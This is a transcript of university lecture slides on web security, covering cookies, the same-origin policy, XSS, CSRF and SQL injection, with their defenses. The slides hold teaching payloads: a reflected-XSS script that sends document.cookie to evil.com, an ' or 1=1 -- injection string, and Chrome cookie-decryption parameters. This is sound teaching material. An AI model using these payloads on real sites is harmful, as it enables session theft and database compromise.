Lecture 26: Web Security CS 5430 5/2/2018.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

Nick Feamster CS 6262 Spring 2009
Cross-site Request Forgery (CSRF) Attacks
Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
EECS 354 Network Security Cross Site Scripting (XSS)
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Cookies Cross site scripting
Copyright© 2002 Avaya Inc. All rights reserved Advanced Cross Site Scripting Evil XSS Anton Rager.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.
Web Applications Testing By Jamie Rougvie Supported by.
1 Robust Defenses for Cross-Site Request Forgery Adam Barth, Collin Jackson, John C. Mitchell Stanford University 15th ACM CCS.
IS-907 Java EE World Wide Web - Overview. World Wide Web - History Tim Berners-Lee, CERN, 1990 Enable researchers to share information: Remote Access.
CS526Topic 12: Web Security (2)1 Information Security CS 526 Topic 9 Web Security Part 2.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Intro to Web Application Security. iHostCodex Web Services - CEO Project-AG – CoFounder OWASP Panay -Chapter Leader -Web Application Pentester -Ethical.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
SQL Injection Attacks S Vinay Kumar, 07012D0506. Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion.
Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
Introduction to Information Security
Group 18: Chris Hood Brett Poche
Building Secure ColdFusion Applications
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
TOPIC: Web Security (Part-4)
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
World Wide Web policy.
Avishai Wool Slides credit: John Mitchell, Stanford
Security in Django.
API Security Auditing Be Aware,Be Safe
Introduction to PHP FdSc Module 109 Server side scripting and
Cookies Cross site scripting
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Cross-Site Forgery
Defense in Depth Web Server Custom HTTP Handler Input Validation
Riding Someone Else’s Wave with CSRF
امنیت نرم‌افزارهای وب تقديم به پيشگاه مقدس امام عصر (عج) عباس نادری
Web Security Advanced Network Security Peter Reiher August, 2014
Lecture 2 - SQL Injection
Web Programming Language
Security: Exploits & Countermeasures

Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Protecting Against Common Web Application Vulnerabilities
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Security: Attacks & Countermeasures
Exploring DOM-Based Cross Site Attacks
Cross Site Request Forgery (CSRF)
Presentation transcript:

Lecture 26: Web Security CS 5430 5/2/2018

2015 Security Incidents

Vulnerabilities by Year https://www.cvedetails.com/vulnerabilities-by-types.php

Vulnerability Occurrence in Applications https://www2.trustwave.com/rs/815-RFM-693/images/2016%20Trustwave%20Global%20Security%20Report.pdf 2017: 85.9%, 21%, 25.3%, 35.9%,18.8%,1.8% (from 2018 report) 2013 2014 2015

Vulnerability Occurrence in Applications 2013 2014 2015

HTTP Basics GET /index.html HTTP/1.1 Host: www.example.com HTTP/1.1 200 OK Date: Fri, 17 March 2017 10:10:00 EDT Content-Type: text/html; charset=UTF-8 Content-Length: 138 Connection: close <html> <head> <title>An Example Page</title> </head> <body> Hello World! </body> </html>

Session Management HTTP GET HTTP OK HTTP GET HTTP OK

Cookie Side-jacking SSL(login) SSL(redirect; set-cookie) Request; cookie=SID

FireSheep (October 2010)

SSL by Default (top 10k) https://trends.builtwith.com/ssl/SSL-by-Default

Cookie Forgery SSL(login) SSL(redirect; set-cookie) Request; cookie=SSID

Cookie Forgery in February 2017, Yahoo announced that 32 million accounts had been compromised by successful cookie forging.

Cookie Theft Malware sometimes targets local browser state

Chrome Encrypted Cookies salt is 'saltysalt' key length is 16 iv is 16 bytes of space b' ' * 16 on Mac OSX: password is in keychain: security find-generic-password -w -s "Chrome Safe Storage" 1003 iterations on Chrome OS: password is in keychain: "security find-generic-password -wga Chrome” on Linux: password is peanuts 1 iteration On Windows: password is current user password CryptProtectData uses 4000 iterations

Vulnerability Occurrence in Applications 2013 2014 2015

HTML <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>CS 5430 Spring 2018: System Security</title> <link rel="stylesheet" href="style.css" /> <link rel="shortcut icon" href="http://www.cornell.edu/favicon.ico" /> </head> <body> <div id="canvas"> <div id="header"> <div id="info"> <a href="http://www.cs.cornell.edu/courses/cs5430/2018sp"> <span class="title">CS 5430</span><br /> <span class="subtitle">System Security</span></a> </div> <div id="logo"> <a href="http://www.cs.cornell.edu"><img src="cslogo.png" alt="Cornell Computer Science" /></a> <!--end header--> <div style="clear:both;"></div> <div id="menu"> <ul> <li><a href="index.html">Home</a></li> <li><a href="syllabus.html">Syllabus</a></li> <li><a href="schedule.html">Schedule</a></li> <li><a href="project.html">Project</a></li> </ul>

Domain Object Model

Same Origin Policy (SOP) Data for http://www.example.com/dir/page.html accessed by: http://www.example.com/dir/page2.html http://www.example.com/dir2/page3.html https://www.example.com/dir/page.html http://www.example.com:81/dir/page.html http://www.example.com:80/dir/page.html http://evil.com/dir/page.html http://example.com/dir/page.html

SOP Exceptions Domain relaxation: document.domain Cross-origin network requests: Access-Control-Allow-Origin Cross-origin client-side communication: postMessage Importing scripts

Cross-Site Scripting (XSS) Form of code injection evil.com sends victim a script that runs on example.com scripts can be imported from remote origins, have privilieges of imported page (not source)

Reflected XSS Attack Server visit web site 1 receive malicious link 2 send valuable data 5 3 4 click on link echo user input Victim Server

Reflected XSS Search field on victim.com: http://victim.com/search.php?term=apple Server-side implementation of search.php: <html> <title> Search Results </title> <body> Results for <?php echo $_GET[term] ?>: ...</body> </html> What if victim instead clicks on: http://victim.com/search.php?term= <script> window.open(“http://evil.com?cookie = ” + document.cookie ) </script>

Reflected XSS Attack Server user gets bad link www.evil.com http://victim.com/search.php? term= <script> ... </script> user clicks on link victim echoes user input Victim Server www.victim.com <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html>

Stored XSS Attack Server steal valuable data 4 1 Inject malicious script 2 User Victim 3 request content receive malicious script Server Victim

Stored XSS attack vectors loaded images HTML attributes user content (comments, blog posts)

Example XSS attacks

XSS Defenses Parameter Validation HTTP-Only Cookies Dynamic Data Tainting Static Analysis Script Sandboxing

Vulnerability Occurrence in Applications 2013 2014 2015

Cross-Site Request Forgery (CSRF) Server Victim establish session 1 send forged request 4 (w/ cookie) 2 3 User Victim visit server (or iframe) receive malicious page Attack Server

CSRF Defenses Secret Validation Token: Referrer Validation: Custom HTTP Header: User Interaction (e.g., CAPTCHA) <input type=hidden value=23a3af01b> Referrer: http://www.facebook.com/home.php X-Requested-By: XMLHttpRequest

Vulnerability Occurrence in Applications 2013 2014 2015

SQL Injection SQL Injection is another example of code injection Adversary exploits user-controlled input to change meaning of database command

SQL Injection DB Enter SELECT * Username & FROM Users Web Password Web Browser (Client) Enter Username & Password Web Server DB SELECT * FROM Users WHERE user='me' AND pwd='1234'

SQL Injection What if user = “ ' or 1=1 -- ” DB Enter SELECT * Web Browser (Client) Enter Username & Password Web Server DB SELECT * FROM Users WHERE user='me' AND pwd='1234' What if user = “ ' or 1=1 -- ”

SQL Injection

SQLi in the Wild

Defenses Against SQL Injection Prepared Statements: String custname = request.getParameter("customerName"); // perform input validation to detect attacks String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( ); Input Validation: Case statements, cast to non-string type Escape User-supplied inputs: Not recommended

Vulnerability Occurrence in Applications 2013 2014 2015